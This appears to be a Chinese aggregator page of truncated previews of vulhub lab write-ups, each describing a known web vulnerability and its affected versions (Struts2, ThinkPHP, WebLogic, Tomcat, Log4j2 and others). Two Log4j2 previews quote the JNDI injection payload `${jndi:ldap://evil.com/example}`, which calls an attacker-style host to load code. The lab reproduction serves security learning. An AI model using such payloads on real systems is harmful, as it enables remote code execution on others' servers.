代码编织梦想

[ vulhub漏洞复现篇 ] drupal 远程代码执行漏洞(cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

[ vulhub漏洞复现篇 ] drupal xss漏洞 (cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

复现vulhub中metabase任意文件读取漏洞(cve-爱代码爱编程

漏洞描述: Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4、1.0.0 <= Metabase version < 1.40.5版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。 影响范围: Metabase version <

复现vulhub中metabase未授权jdbc远程代码执行漏洞(cve-爱代码爱编程

漏洞描述: Metabase是一种流行的商业智能和数据可视化软件包。Metabase open source 0.46.6.1之前的版本和Metabase Enterprise 1.46.6.1之前的版本存在一个漏洞,允许攻击者在服务器的权限级别上执行任意命令。利用时不需要身份验证。该漏洞被指定为 CVE-2023-38646。该漏洞是由预身份验证 AP

vulhub中struts2-爱代码爱编程

影响版本: 2.1.0 - 2.3.13 ## 原理 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: ```xml <package name="S2-012" extends="struts-default">     <action name="

vulhub中struts2-爱代码爱编程

影响版本: 2.0.0 - 2.1.8.1 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进

vulhub中 apache airflow celery 消息中间件命令执行漏洞复现(cve-爱代码爱编程

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。 1.利用这个漏洞需要控制消息中间件,Vulhub环境中Redis存在未授权访问。通过未授权访问,攻击者可以下发自带的任务`air

vulhub:apache解析漏洞apache_parsing-爱代码爱编程

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。如 1.php.xxxxx 漏洞原理 Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如如下配置文件 AddType text/html .html AddLanguage zh-CN

vulhub中thinkphp 多语言本地文件包含漏洞复现_thinkphp多语言漏洞-爱代码爱编程

ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。 虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并

vulhub中php利用gnu c iconv将文件读取变成rce(cve-爱代码爱编程

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。 如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。 漏洞复现 在使用原作者给出的[exploit](htt

vulhub中nexus repository manager 3 未授权目录穿越漏洞(cve-爱代码爱编程

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 环境启动后,访问`http://your-ip:8081`即可看到Nexus的默认页面。 漏洞复现 与Orange Tsai在

vulhub中jenkins cli 接口任意文件读取漏洞复现(cve-爱代码爱编程

Jenkins是一个开源的自动化服务器。 Jenkins使用[args4j](https://github.com/kohsuke/args4j)来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过`@`字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。 该漏洞影响Jenki

vulhub/thinkphp漏洞复现_thinkphp 5.x 远程代码执行漏洞复现 vulhub-爱代码爱编程

5-rce 漏洞原理 在thinkphp版本5中,由于没有正确处理控制器名,导致在网站没有开启路由时可以执行任意方法,导致远程命令执行漏洞。 影响版本 5.0.0<=ThinkPHP5<=5.0.23 5.1.0<=ThinkPHP<=5.1.30 漏洞复现 1、docker启动环境(docker安装步骤自行搜索)

vulhub中apache solr 远程命令执行漏洞复现(cve-爱代码爱编程

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数

vulhub中git-爱代码爱编程

GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 测试环境 为了不和docker母机的ssh端口冲突,将容器的ssh端口设置成3322。本目录下我生成了一个id_rsa,这是ssh的私钥,连接的时候请指定之。 在连接以前,需要先设置私钥的权限为0600:chmod 0600 id_rsa,否则连接可

vulhub中weblogic wls core components 反序列化命令执行漏洞复现(cve-爱代码爱编程

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 访问http://your-ip:7001/console,初始化整个环境。 漏洞复现 首先下载ysoseri

log4j2 jndi 注入漏洞(cve-爱代码爱编程

一、前言 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。 Log4j是什么?JNDI又是什么? Log4

vulhub中tomcat put方法任意写文件漏洞复现(cve-爱代码爱编程

漏洞原理 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet>   <servlet-name>default</servlet-name>   <servlet-class>org.apache.catalina.servlets.De

vulhub中aapache tomcat ajp 文件包含漏洞复现(cve-爱代码爱编程

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。 利用如下工具均可测试漏洞: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 工具需要用到python2, 如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件 &l

vulhub中apache log4j2 lookup jndi 注入漏洞(cve-爱代码爱编程

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。 1.服务启动后,访问`http://your-ip: